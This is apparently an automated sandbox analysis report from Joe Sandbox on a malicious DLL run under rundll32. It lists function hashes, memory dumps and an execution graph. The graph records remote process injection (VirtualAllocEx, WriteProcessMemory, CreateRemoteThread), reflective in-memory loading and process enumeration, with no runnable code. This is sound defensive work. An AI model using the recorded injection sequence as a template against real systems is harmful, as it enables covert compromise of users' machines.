                                                                                                                      • Instruction ID: 7f3b35c752c21757f1db10fb95d949ab252f13624666dd095f9e840542a688eb
                                                                                                                      • Opcode Fuzzy Hash: fe28caa2cce135917cb9ddf218cb5b10bc14cf2eff41ae8af3362b4de2454d38
                                                                                                                      • Instruction Fuzzy Hash: 8BE092B1204A4891FF874B90F5503E56322AB4C7D0F88D022BD0906396CF38CB8CC300
                                                                                                                      Function 000000018001AB6C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DownlevelLocaleName__crttry_get_function
                                                                                                                      • String ID: LocaleNameToLCID
                                                                                                                      • API String ID: 404522899-2050040251
                                                                                                                      • Opcode ID: 753a1e2ca4a7c4e14edabfe687945710c6edb93721609b4771d2433c241a515f
                                                                                                                      • Instruction ID: 5b4ece58d35bd8437c3b79418c835bfcfaf0ac31156dd0188a9fb0c6fc65be12
                                                                                                                      • Opcode Fuzzy Hash: 753a1e2ca4a7c4e14edabfe687945710c6edb93721609b4771d2433c241a515f
                                                                                                                      • Instruction Fuzzy Hash: 9AE01235219A4895FB879B95F5913E93362AB8D7C0F98D022F91906396CF38CB4DC714
                                                                                                                      Function 00000001800116DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 0000000180011705
                                                                                                                      • TlsSetValue.KERNEL32(?,?,00000000,000000018000FCFA,?,?,?,000000018000FC95,?,?,?,?,000000018000F1AA), ref: 000000018001171C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Valuetry_get_function
                                                                                                                      • String ID: FlsSetValue
                                                                                                                      • API String ID: 738293619-3750699315
                                                                                                                      • Opcode ID: 22eeb772723b431fdf52d06708df64909394b7b854e5ab45bda407cd80ffd7de
                                                                                                                      • Instruction ID: 3cc47aad495fecb8ad6987c83b9020599e1b3a5e6568dcd32a85816c8cc3edcb
                                                                                                                      • Opcode Fuzzy Hash: 22eeb772723b431fdf52d06708df64909394b7b854e5ab45bda407cd80ffd7de
                                                                                                                      • Instruction Fuzzy Hash: 30E092B5604A0892EBDB4B50F4847D42361AB4C7E1F48D026B95D063D5CE38CB8CD354
                                                                                                                      Function 0000000180023C70 Relevance: 5.1, APIs: 4, Instructions: 92COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Exception$Throw$FileHeaderRaise
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3102897148-0
                                                                                                                      • Opcode ID: a055ed6aad9b63c0af86c8a89e4476d6b23f75f41965a51dd8ecfe93ef93ad13
                                                                                                                      • Instruction ID: d5fbad0a112b75453b16c0a490e34593e3ae9bf60d8b6f67d57a8b7cc3e1bdf6
                                                                                                                      • Opcode Fuzzy Hash: a055ed6aad9b63c0af86c8a89e4476d6b23f75f41965a51dd8ecfe93ef93ad13
                                                                                                                      • Instruction Fuzzy Hash: A0118F76710A888AE75EFE3298523EA3321EB987C4F14D435FA5E4BA9ADF24C5164300

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:6.4%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:4.9%
                                                                                                                      Total number of Nodes:245
                                                                                                                      Total number of Limit Nodes:22
                                                                                                                      execution_graph 2165 26e7a14c0 2166 26e7a14d0 SleepEx 2165->2166 2166->2166 2167 292116a1200 2168 292116a121f 2167->2168 2169 292116a1215 2167->2169 2172 292116a122d 2168->2172 2175 292116a11c0 VirtualAlloc 2168->2175 2176 292116a1070 2169->2176 2173 292116a123d 2173->2172 2179 292116a1190 2173->2179 2175->2173 2177 292116a1081 2176->2177 2178 292116a1085 VirtualQuery 2176->2178 2177->2168 2178->2177 2180 292116a11a1 VirtualFree 2179->2180 2181 292116a11b4 2179->2181 2180->2181 2181->2172 2182 292116a1000 2188 292116a2650 2182->2188 2203 292116a2050 2188->2203 2191 292116a26b0 2192 292116a2714 2191->2192 2193 292116a2702 SetLastError 2191->2193 2194 292116a2741 SetLastError 2192->2194 2195 292116a2753 2192->2195 2200 292116a1055 ExitProcess 2193->2200 2194->2200 2196 292116a276c 2195->2196 2202 292116a27bb 2195->2202 2197 292116a2787 SetLastError 2196->2197 2198 292116a2799 2196->2198 2197->2200 2198->2200 2201 292116a2893 SetLastError 2198->2201 2199 292116a2876 SetLastError 2199->2200 2201->2200 2202->2198 2202->2199 2238 292116a1340 2203->2238 2206 292116a20d1 2208 292116a1340 SetLastError 2206->2208 2207 292116a20bf SetLastError 2230 292116a103a 2207->2230 2209 292116a20f8 2208->2209 2210 292116a212c SetLastError 2209->2210 2211 292116a213e 2209->2211 2209->2230 2210->2230 2212 292116a2160 2211->2212 2213 292116a214e SetLastError 2211->2213 2214 292116a216f SetLastError 2212->2214 2218 292116a2181 GetNativeSystemInfo 2212->2218 2213->2230 2214->2230 2216 292116a229a VirtualAlloc 2219 292116a22ff GetProcessHeap HeapAlloc 2216->2219 2220 292116a22c7 VirtualAlloc 2216->2220 2217 292116a2288 SetLastError 2217->2230 2218->2216 2218->2217 2222 292116a234b 2219->2222 2223 292116a2326 VirtualFree SetLastError 2219->2223 2220->2219 2221 292116a22ed SetLastError 2220->2221 2221->2230 2224 292116a1340 SetLastError 2222->2224 2223->2230 2225 292116a23fc 2224->2225 2226 292116a240a VirtualAlloc 2225->2226 2237 292116a2400 2225->2237 2227 292116a2450 2226->2227 2241 292116a1380 2227->2241 2230->2191 2231 292116a24ac 2231->2237 2249 292116a1c80 2231->2249 2235 292116a2547 2236 292116a25da SetLastError 2235->2236 2235->2237 2236->2237 2237->2230 2269 292116a28e0 2237->2269 2239 292116a136e 2238->2239 2240 292116a135f SetLastError 2238->2240 2239->2206 2239->2207 2239->2230 2240->2239 2245 292116a13ce 2241->2245 2242 292116a149c 2243 292116a1340 SetLastError 2242->2243 2246 292116a14c0 2243->2246 2244 292116a141e VirtualAlloc 2244->2245 2248 292116a1458 2244->2248 2245->2242 2245->2244 2245->2248 2247 292116a14cb VirtualAlloc 2246->2247 2246->2248 2247->2248 2248->2231 2250 292116a1cdd IsBadReadPtr 2249->2250 2251 292116a1cd3 2249->2251 2250->2251 2253 292116a1d1c 2250->2253 2251->2237 2262 292116a1790 2251->2262 2253->2251 2254 292116a1d7d 2253->2254 2255 292116a1d65 SetLastError 2253->2255 2276 292116a1200 2254->2276 2255->2251 2258 292116a1db0 SetLastError 2258->2251 2260 292116a1de4 2260->2251 2261 292116a1f9c SetLastError 2260->2261 2261->2251 2264 292116a1830 2262->2264 2263 292116a15e0 2 API calls 2268 292116a198b 2263->2268 2265 292116a1904 2264->2265 2267 292116a1987 2264->2267 2285 292116a15e0 2264->2285 2265->2235 2267->2263 2267->2268 2268->2235 2270 292116a2900 2269->2270 2272 292116a2905 2269->2272 2270->2230 2271 292116a29b1 2273 292116a29bd VirtualFree 2271->2273 2274 292116a29d4 GetProcessHeap HeapFree 2271->2274 2272->2271 2275 292116a1190 VirtualFree 2272->2275 2273->2274 2274->2270 2275->2271 2277 292116a121f 2276->2277 2278 292116a1215 2276->2278 2281 292116a122d 2277->2281 2284 292116a11c0 VirtualAlloc 2277->2284 2279 292116a1070 VirtualQuery 2278->2279 2279->2277 2281->2258 2281->2260 2282 292116a123d 2282->2281 2283 292116a1190 VirtualFree 2282->2283 2283->2281 2284->2282 2286 292116a1608 2285->2286 2287 292116a15fe 2285->2287 2288 292116a1619 2286->2288 2290 292116a168c VirtualProtect 2286->2290 2287->2267 2288->2287 2289 292116a1664 VirtualFree 2288->2289 2289->2287 2290->2287 2305 292116a1fc0 LoadLibraryA 2306 292116a1fe6 2305->2306 2307 26e7a1340 2308 26e7a2380 2307->2308 2309 26e7a23cb 2308->2309 2310 26e7a2397 _lock 2308->2310 2313 26e7a23a7 2310->2313 2311 26e7a23b4 _unlock 2311->2309 2312 26e7a243e _unlock 2312->2309 2313->2311 2313->2312 2314 26e7a23f9 2313->2314 2314->2311 2370 292116a2000 GetProcAddress 2371 26e7a2581 DeleteCriticalSection 2372 292116a1cf6 2373 292116a1d04 IsBadReadPtr 2372->2373 2374 292116a1d1c 2373->2374 2382 292116a1fa9 2373->2382 2375 292116a1d7d 2374->2375 2376 292116a1d65 SetLastError 2374->2376 2374->2382 2377 292116a1200 3 API calls 2375->2377 2376->2382 2378 292116a1da3 2377->2378 2379 292116a1db0 SetLastError 2378->2379 2380 292116a1de4 2378->2380 2379->2382 2380->2382 2383 292116a1f9c SetLastError 2380->2383 2383->2382 2292 26e7a1370 Sleep VirtualAllocEx 2293 26e7a13c0 WriteProcessMemory 2292->2293 2295 26e7a143c 2292->2295 2294 26e7a13f0 CreateRemoteThread 2293->2294 2293->2295 2294->2295 2296 26e7a1429 2294->2296 2296->2295 2297 26e7a142e WaitForSingleObject 2296->2297 2297->2295 2319 26e7a1530 2320 26e7a153f 2319->2320 2323 26e7a1370 Sleep VirtualAllocEx 2320->2323 2324 26e7a13c0 WriteProcessMemory 2323->2324 2326 26e7a143c 2323->2326 2325 26e7a13f0 CreateRemoteThread 2324->2325 2324->2326 2325->2326 2327 26e7a1429 2325->2327 2327->2326 2328 26e7a142e WaitForSingleObject 2327->2328 2328->2326 2384 292116a2405 2385 292116a262c 2384->2385 2386 292116a28e0 4 API calls 2385->2386 2387 292116a263e 2386->2387 2388 26e7a1cdb 2389 26e7a1d00 calloc 2388->2389 2390 26e7a1cf6 2388->2390 2389->2390 2391 26e7a1d17 EnterCriticalSection LeaveCriticalSection 2389->2391 2391->2390 2298 292116a15e0 2299 292116a1608 2298->2299 2300 292116a15fe 2298->2300 2301 292116a1619 2299->2301 2303 292116a168c VirtualProtect 2299->2303 2301->2300 2302 292116a1664 VirtualFree 2301->2302 2302->2300 2303->2300 2333 26e7a17a0 2339 26e7a17b9 2333->2339 2334 26e7a186e 2335 26e7a18f2 2336 26e7a1730 3 API calls 2335->2336 2337 26e7a1901 2336->2337 2338 26e7a182d VirtualQuery 2338->2339 2340 26e7a18d7 2338->2340 2339->2334 2339->2335 2339->2338 2342 26e7a1880 VirtualProtect 2339->2342 2341 26e7a1730 3 API calls 2340->2341 2341->2335 2342->2334 2343 26e7a18b8 GetLastError 2342->2343 2345 26e7a1730 2343->2345 2348 26e7a175c 2345->2348 2346 26e7a182d VirtualQuery 2347 26e7a186e 2346->2347 2346->2348 2347->2339 2348->2346 2348->2347 2349 26e7a1880 VirtualProtect 2348->2349 2349->2347 2350 26e7a18b8 GetLastError 2349->2350 2350->2348 2392 292116a1860 2395 292116a1878 2392->2395 2393 292116a15e0 2 API calls 2394 292116a198b 2393->2394 2396 292116a1904 2395->2396 2397 292116a15e0 2 API calls 2395->2397 2398 292116a1987 2395->2398 2397->2398 2398->2393 2398->2394 2399 26e7a1f60 2401 26e7a1f6f 2399->2401 2400 26e7a1fde 2401->2400 2402 26e7a1fc9 strncmp 2401->2402 2402->2400 2402->2401 2403 26e7a1460 2404 26e7a1370 5 API calls 2403->2404 2405 26e7a1497 2404->2405 2406 26e7a1660 2407 26e7a1669 2406->2407 2408 26e7a166d 2407->2408 2409 26e7a1de0 3 API calls 2407->2409 2410 26e7a1685 2409->2410 2351 292116a2030 FreeLibrary 2356 26e7a1690 2357 26e7a16a2 2356->2357 2360 26e7a16b2 2357->2360 2361 26e7a1de0 2357->2361 2359 26e7a1705 2362 26e7a1ea0 2361->2362 2363 26e7a1dee 2361->2363 2362->2359 2364 26e7a1df4 2363->2364 2366 26e7a1e40 2363->2366 2368 26e7a1e02 2363->2368 2365 26e7a1ec0 InitializeCriticalSection 2364->2365 2364->2368 2365->2368 2367 26e7a1e79 DeleteCriticalSection 2366->2367 2366->2368 2369 26e7a1e68 free 2366->2369 2367->2368 2368->2359 2369->2367 2369->2369 2411 26e7a11d0 2412 26e7a1238 2411->2412 2414 26e7a11f1 2411->2414 2415 26e7a1251 2412->2415 2416 26e7a12f8 2412->2416 2413 26e7a1220 2414->2413 2429 26e7a14e0 2414->2429 2433 26e7a1010 2415->2433 2418 26e7a14e0 5 API calls 2416->2418 2421 26e7a120d 2418->2421 2420 26e7a1256 2420->2413 2420->2414 2423 26e7a127a 2420->2423 2428 26e7a12a2 2420->2428 2421->2413 2422 26e7a1010 5 API calls 2421->2422 2422->2413 2425 26e7a14e0 5 API calls 2423->2425 2424 26e7a1010 5 API calls 2424->2413 2426 26e7a128f 2425->2426 2426->2413 2427 26e7a14e0 5 API calls 2426->2427 2427->2428 2428->2413 2428->2424 2430 26e7a151c 2429->2430 2431 26e7a14e9 2429->2431 2430->2421 2432 26e7a1370 5 API calls 2431->2432 2432->2430 2434 26e7a1026 2433->2434 2435 26e7a10a0 2433->2435 2437 26e7a1050 Sleep 2434->2437 2438 26e7a1068 2434->2438 2444 26e7a1084 2434->2444 2436 26e7a10e6 2435->2436 2441 26e7a10d1 Sleep 2435->2441 2435->2444 2443 26e7a1180 _initterm 2436->2443 2436->2444 2437->2434 2439 26e7a107a _amsg_exit 2438->2439 2440 26e7a1140 2438->2440 2439->2444 2445 26e7a2450 2440->2445 2441->2435 2443->2444 2444->2420 2448 26e7a2464 2445->2448 2446 26e7a24ad 2446->2444 2447 26e7a24a5 free 2447->2446 2448->2446 2448->2447 2453 26e7a1d50 2454 26e7a1d70 EnterCriticalSection 2453->2454 2455 26e7a1d62 2453->2455 2456 26e7a1d8c 2454->2456 2457 26e7a1db3 LeaveCriticalSection 2454->2457 2456->2457 2458 26e7a1dae free 2456->2458 2458->2457 2459 26e7a2549 VirtualAllocEx

                                                                                                                      Executed Functions

                                                                                                                      Function 000000026E7A1370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62injectionsleepmemoryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2937147216.000000026E7A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 000000026E7A0000, based on PE: true
                                                                                                                      • Associated: 00000012.00000002.2937105023.000000026E7A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000012.00000002.2937147216.000000026E7E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_26e7a0000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocCreateMemoryObjectProcessRemoteSingleSleepThreadVirtualWaitWrite
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 3172812169-2766056989
                                                                                                                      • Opcode ID: 0eb28147f580e3073132cd4857f7339373183e42c4e03efc949c79a274ad3264
                                                                                                                      • Instruction ID: 9740b8a67545548af73fc701d4c0f3df214f93be1b9708ce57f24a6a41fb1eaa
                                                                                                                      • Opcode Fuzzy Hash: 0eb28147f580e3073132cd4857f7339373183e42c4e03efc949c79a274ad3264
                                                                                                                      • Instruction Fuzzy Hash: 7811B47531575046FA528FAAAC08756A694B789FF0F454338AF79077D4DF39C10A8704
                                                                                                                      Function 00007DF4F0240100 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000003.1867228523.00007DF4F0240000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4F0240000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_3_7df4f0240000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateSnapshotToolhelp32
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 3332741929-2766056989
                                                                                                                      • Opcode ID: a244b4c46065a0b172c05969a3639a80dbbfb73a6b591c48ef82bced5c87c14f
                                                                                                                      • Instruction ID: 4c9a43d86eb8ec3fa90282b683007a6ef1a59bf84b1eafae76d939d2cbb38f15
                                                                                                                      • Opcode Fuzzy Hash: a244b4c46065a0b172c05969a3639a80dbbfb73a6b591c48ef82bced5c87c14f
                                                                                                                      • Instruction Fuzzy Hash: 9771D03161494C8FEF94EF5CC898BA937E1FB98315F10462AE81EC72A1DB74D994CB80
                                                                                                                      Function 00007DF4F0240000 Relevance: 4.6, APIs: 3, Instructions: 88processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000003.1867228523.00007DF4F0240000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4F0240000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_3_7df4f0240000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2353314856-0
                                                                                                                      • Opcode ID: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                      • Instruction ID: 1f51d84387a7173b391353be83027292ec1b2063b66d30f797416cb60d0907b9
                                                                                                                      • Opcode Fuzzy Hash: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                      • Instruction Fuzzy Hash: C121DF3461494C8FEBA5EB6CCC98BEA37E1FBA8310F404226D41EDB290DE75DE848750
                                                                                                                      Function 000002921300D2AC Relevance: .0, Instructions: 43COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000003.1799236503.0000029212FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029212FD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_3_29212fd0000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4f8c2193cd15d56b920b71f0a62798233d7bc621eaf68b72cfb2e802f18a24de
                                                                                                                      • Instruction ID: 66ae8bb1312c9d8c46a63d479f1b3c592a2ca9711104408c41da62ff093ea320
                                                                                                                      • Opcode Fuzzy Hash: 4f8c2193cd15d56b920b71f0a62798233d7bc621eaf68b72cfb2e802f18a24de
                                                                                                                      • Instruction Fuzzy Hash: F5F08170618B408BE744DF2884C963A77E1FB98755F24492EE88987361CB319842CA43
                                                                                                                      Function 000002921300D31C Relevance: .0, Instructions: 37COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000003.1799236503.0000029212FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029212FD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_3_29212fd0000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 744c819c75b2bbda755093bb73dffba834d27d1bf64d68f532f853bd1298e79c
                                                                                                                      • Instruction ID: 8566575effe11dcfca5e96efbe1ad3fc805632cf9930f65de432e3d7c2834eb8
                                                                                                                      • Opcode Fuzzy Hash: 744c819c75b2bbda755093bb73dffba834d27d1bf64d68f532f853bd1298e79c
                                                                                                                      • Instruction Fuzzy Hash: 0BF05470A24F448BDB08AF2C884A63977D2F7A8745F54452EA448D7361DB35E5468B43
                                                                                                                      Function 00000292116A2050 Relevance: 22.8, APIs: 15, Instructions: 324COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 0 292116a2050-292116a209a call 292116a1340 3 292116a209c-292116a209e 0->3 4 292116a20a3-292116a20bd 0->4 5 292116a2640-292116a2647 3->5 6 292116a20d1-292116a20fa call 292116a1340 4->6 7 292116a20bf-292116a20cc SetLastError 4->7 10 292116a20fc-292116a20fe 6->10 11 292116a2103-292116a212a 6->11 7->5 10->5 12 292116a212c-292116a2139 SetLastError 11->12 13 292116a213e-292116a214c 11->13 12->5 14 292116a2160-292116a216d 13->14 15 292116a214e-292116a215b SetLastError 13->15 16 292116a2181-292116a21b1 14->16 17 292116a216f-292116a217c SetLastError 14->17 15->5 18 292116a21cb-292116a21d8 16->18 17->5 19 292116a21da-292116a21e3 18->19 20 292116a222b-292116a2286 GetNativeSystemInfo 18->20 21 292116a21fc-292116a220e 19->21 22 292116a21e5-292116a21fa 19->22 23 292116a229a-292116a22c5 VirtualAlloc 20->23 24 292116a2288-292116a2295 SetLastError 20->24 25 292116a2213-292116a221d 21->25 22->25 26 292116a22ff-292116a2324 GetProcessHeap HeapAlloc 23->26 27 292116a22c7-292116a22eb VirtualAlloc 23->27 24->5 28 292116a221f-292116a2224 25->28 29 292116a2229 25->29 31 292116a234b-292116a2369 26->31 32 292116a2326-292116a2346 VirtualFree SetLastError 26->32 27->26 30 292116a22ed-292116a22fa SetLastError 27->30 28->29 29->18 30->5 33 292116a236b-292116a2373 31->33 34 292116a2375 31->34 32->5 36 292116a237d-292116a23fe call 292116a1340 33->36 34->36 39 292116a240a-292116a24a7 VirtualAlloc call 292116a1120 call 292116a1380 36->39 40 292116a2400 36->40 47 292116a24ac-292116a24ae 39->47 41 292116a262c-292116a263e call 292116a28e0 40->41 41->5 48 292116a24ba-292116a24e3 47->48 49 292116a24b0 47->49 50 292116a24e5-292116a2507 call 292116a1ab0 48->50 51 292116a2509-292116a250e 48->51 49->41 52 292116a2515-292116a2529 call 292116a1c80 50->52 51->52 57 292116a252b 52->57 58 292116a2535-292116a2549 call 292116a1790 52->58 57->41 61 292116a254b 58->61 62 292116a2555-292116a2569 call 292116a19f0 58->62 61->41 65 292116a256b 62->65 66 292116a2575-292116a2581 62->66 65->41 67 292116a2618-292116a261d 66->67 68 292116a2587-292116a2590 66->68 69 292116a2625-292116a262a 67->69 70 292116a2592-292116a25d8 68->70 71 292116a25f7-292116a2612 68->71 69->5 69->41 74 292116a25da-292116a25e5 SetLastError 70->74 75 292116a25e9-292116a25f5 70->75 72 292116a2616 71->72 72->69 74->41 75->72
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000292116A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_292116a0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: 4d975507dabfc9bcff4ce07bface502bc42e706bf54c750510e23b7039734968
                                                                                                                      • Instruction ID: ccb7948a99767b49ac44a32642b4dae98553a7bf8f95190c0377a9c11e257a43
                                                                                                                      • Opcode Fuzzy Hash: 4d975507dabfc9bcff4ce07bface502bc42e706bf54c750510e23b7039734968
                                                                                                                      • Instruction Fuzzy Hash: 78F1DB76259BE4D6E7608B15F49475EB7A0F7C8B80F105015EB8E83BAADF79C498CB00
                                                                                                                      Function 00007DF4F02B0000 Relevance: 6.2, APIs: 4, Instructions: 179registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000003.1843352576.00007DF4F02B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4F02B0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_3_7df4f02b0000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: OpenValue$Query
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3881042660-0
                                                                                                                      • Opcode ID: 626bf157ab92892a21200f7f99e5a6ae81b2c8b077ae05ca6636b539537add79
                                                                                                                      • Instruction ID: eb12e6fe3ee76e0205f349894133a15093fe0e107e50ae6fce22d3ab1681291a
                                                                                                                      • Opcode Fuzzy Hash: 626bf157ab92892a21200f7f99e5a6ae81b2c8b077ae05ca6636b539537add79
                                                                                                                      • Instruction Fuzzy Hash: 3E512F3121894C8FDB95EB1CCC84BE933E1FBE9324F104626A45EC32A4DE75EA948B40
                                                                                                                      Function 00000292116A15E0 Relevance: 3.1, APIs: 2, Instructions: 108COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000292116A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_292116a0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1263568516-0
                                                                                                                      • Opcode ID: 73d186ae7e7a30a1d001e304d0e7452e82c9afbcf55bcb3a2e017d0d50acf0a3
                                                                                                                      • Instruction ID: 55a2f69ce5bba9362c10b9a3f5ef62a5af1b519a417f449ae2921efab71fa865
                                                                                                                      • Opcode Fuzzy Hash: 73d186ae7e7a30a1d001e304d0e7452e82c9afbcf55bcb3a2e017d0d50acf0a3
                                                                                                                      • Instruction Fuzzy Hash: 0D51EA76218794DBEB60CF1AE08471ABBA1F3C8B84F151015EA8DC77A5DB79D994CF00
                                                                                                                      Function 00000292116A1380 Relevance: 2.6, APIs: 2, Instructions: 119memoryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000292116A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_292116a0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: 816fc88231aa2467bf2252115963d1d14762f6c5c40f282537df11a36abcc1ab
                                                                                                                      • Instruction ID: e728dd8864aa0518940b5c4f19db60fe91e913cb957f55d61ff212cff7ca0b0e
                                                                                                                      • Opcode Fuzzy Hash: 816fc88231aa2467bf2252115963d1d14762f6c5c40f282537df11a36abcc1ab
                                                                                                                      • Instruction Fuzzy Hash: 1451E876618B84C6CB60CB1AF48461AB7A0F7C8BD8F145115EE8E83B6ADB39C594CF00
                                                                                                                      Function 000000026E7A14C0 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 129 26e7a14c0-26e7a14cc 130 26e7a14d0-26e7a14d7 SleepEx 129->130 130->130
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
